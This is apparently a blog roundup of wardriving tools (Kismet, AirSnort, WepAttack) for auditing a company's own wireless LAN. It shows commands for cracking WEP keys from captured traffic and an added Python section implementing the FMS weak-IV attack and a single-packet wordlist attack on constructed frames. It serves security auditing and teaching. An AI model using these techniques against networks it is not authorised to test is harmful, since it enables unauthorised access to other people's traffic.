WLAN Security Auditing
To check how secure our company's wireless LAN is, I tried different wardriving tools. Here is a short roundup.
Kismet
Kismet scans for available networks and gives you some interesting information about them.
#> apt-get -t testing install kismet
You may need to edit /etc/kismet/kismet.conf to match your wireless NIC and the driver you use. I'm running the hostap driver on my Netgear MA401 (Prism 2.5), so this is the line I use:
source=prism2_hostap,wlan0,prism2source
You need to be root to run kismet. When started it gathers information about the available networks in a mode called "Autofit". To actually select an interesting network (e.g. your own) press s to sort the list by a key of your choice, then select the network and press i for more information.
Make sure your network has at least WEP encryption enabled. It is possible to hide the name of your network (SSID hiding), but kismet will detect the network nonetheless and show it as "cloaked".
Kismet logs received packets to /var/log/kismet/, which will come in handy later.
AirSnort
The next tool is AirSnort, a GTK-based network sniffer similar to Kismet but able to break WEP encryption. Install it and run it as root.
#> apt-get -t testing install airsnort
Some theory first. WEP uses the RC4 stream cipher, and the way WEP keys it (a 24-bit IV sent in the clear, concatenated with the secret key) has known flaws which are described elsewhere. Simply put, for a few thousand of the possible IVs (the so-called weak IVs) the first byte of keystream leaks information about one byte of the secret key, and the first plaintext byte of every frame is known anyway. A few years ago you just had to run a tool like AirSnort for a few minutes: it collected the frames sent with weak IVs from the air and pieced the key together from them.
Well, nowadays all manufacturers have changed their WEP implementations to skip these weak IVs, so AirSnort will need a large number of packets to get the WEP key. If you see a lot of "interesting" packets in AirSnort you know there is some old hardware in your net which needs a firmware update.
Update: I haven't tried it yet, but there is a simple way to get the huge amount of packets you need: capture a few (correctly encrypted) packets from the air and then reinject them into the network. Other hosts will answer, generating the wanted traffic to sniff. So if you need to protect important stuff, do not rely on WEP!
WepAttack
Even if the manufacturers don't use the weak IVs anymore there is room for a simple attack: using a dictionary to guess the WEP key. The interesting thing is that this can be done completely undetected. All that is needed is a single passively sniffed packet, because every WEP frame carries a CRC-32 checksum (the ICV) under the encryption, so a key guess can be verified offline without sending anything.
Let's install the tool first. Get it from http://wepattack.sourceforge.net and unpack it. For compiling you need some libraries, too.
#> apt-get -t testing install libssl-dev libpcap-dev
$> tar -xzvf WepAttack-0.1.3.tar.gz
$> cd WepAttack-0.1.3/src/
$> make
#> cp wepattack /usr/local/bin/
To brute force attack a WEP encrypted packet you need a wordlist (available from the above site) and a packet dump from kismet. Then just run the following command.
$> wepattack -f /var/log/kismet/Kismet-<date>-<num>.dump -w wordlist
If this finds your key, your passphrase is too weak: anything a wordlist contains will be found from one packet.
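The weak-IV attack from the AirSnort section and the single-packet wordlist attack from the WepAttack section, as one added Python example. This is not code from this page, from AirSnort or from WepAttack. It contains a small WEP implementation (RC4 plus the CRC-32 ICV), frames constructed in memory, the FMS vote over weak IVs of the form (B, 255, x) with every candidate key confirmed against the ICV, and a wordlist attack that tries two assumed key derivations (the word itself as a 40-bit key, and MD5 of the passphrase repeated to 64 bytes as a 104-bit key). All function names, keys, IVs and wordlist entries are made up for the demo.

```python
# Added example (not code from the page, AirSnort or WepAttack): a toy WEP
# implementation, the FMS weak-IV attack and a single-packet wordlist attack.
# Every key, IV, frame and wordlist entry below is constructed for the demo.
import hashlib
import random
import zlib

# LLC/SNAP header that starts every WEP data frame: first plaintext byte is 0xAA.
SNAP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"

def ksa(key):
    """RC4 key scheduling over key = IV || secret (bytes, used cyclically)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4(key, data):
    """XOR data with the RC4 keystream (same operation encrypts and decrypts)."""
    S = ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(secret, iv, payload):
    """WEP frame body: IV || RC4_{IV||secret}(payload || CRC32(payload))."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + rc4(iv + secret, payload + icv)

def wep_check(secret, frame):
    """True if secret decrypts frame to a payload whose ICV matches (offline key test)."""
    plain = rc4(frame[:3] + secret, frame[3:])
    return zlib.crc32(plain[:-4]).to_bytes(4, "little") == plain[-4:]

def fms_votes(frames, known, b):
    """FMS vote for key byte b (b >= 3) given the IV and recovered bytes 3..b-1.
    Only frames whose IV leaves the KSA 'resolved' after b steps leak anything,
    and about 5% of those votes name the right byte; the rest are noise."""
    votes = [0] * 256
    for frame in frames:
        key = list(frame[:3]) + list(known)
        S = list(range(256))
        j = 0
        for i in range(b):
            j = (j + S[i] + key[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        x = S[1]
        if x < b and (x + S[x]) & 0xFF == b:
            z = frame[3] ^ SNAP[0]  # first keystream byte: plaintext byte is known
            votes[(S.index(z) - j - S[b]) & 0xFF] += 1
    return votes

def fms_crack(frames, key_len, top=5):
    """Walk the `top` most voted candidates per byte depth-first and confirm a
    complete key against the ICV of one frame; returns None if nothing fits."""
    def search(known):
        if len(known) == key_len:
            return known if wep_check(known, frames[0]) else None
        votes = fms_votes(frames, known, 3 + len(known))
        for cand in sorted(range(256), key=lambda v: -votes[v])[:top]:
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")

def fms_demo(seed=7):
    """Constructed capture: one frame for every weak IV of the form (b, 255, x)."""
    rng = random.Random(seed)
    secret = bytes(rng.randrange(256) for _ in range(5))  # 40-bit WEP key
    payload = SNAP + b"constructed sample frame"
    frames = [wep_encrypt(secret, bytes((b, 255, x)), payload)
              for b in range(3, 3 + len(secret)) for x in range(256)]
    return secret, fms_crack(frames, len(secret))

def candidate_keys(word):
    """Assumed key generators for a wordlist entry (not WepAttack's exact list):
    the word itself as a 40-bit key, and MD5(word repeated to 64 bytes)[:13]."""
    w = word.encode()
    if not w:
        return
    if len(w) == 5:
        yield w
    yield hashlib.md5((w * (64 // len(w) + 1))[:64]).digest()[:13]

def dictionary_attack(frame, wordlist):
    """One passively sniffed frame is enough: the ICV confirms a correct guess."""
    for word in wordlist:
        for key in candidate_keys(word):
            if wep_check(key, frame):
                return word, key
    return None

def dictionary_demo():
    frame = wep_encrypt(b"swift", b"\x01\x02\x03", SNAP + b"constructed")
    return dictionary_attack(frame, ["letmein", "wlan1", "company", "swift"])
```

fms_demo() recovers a random 40-bit key from 1280 weak-IV frames and dictionary_demo() finds the key "swift" from a single frame. The resolved-state check in fms_votes is the generic test, so the same routine works on any capture; the (B, 255, x) IVs are simply the family that reliably passes it, which is why firmware now skips them and AirSnort needs far more traffic than it used to.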
Summary
If your WLAN passes all these tests it should be reasonably safe from most casual crackers. At our company all traffic to the internal LAN is additionally encrypted with IPsec, but for a home network this may be fine even without stronger encryption.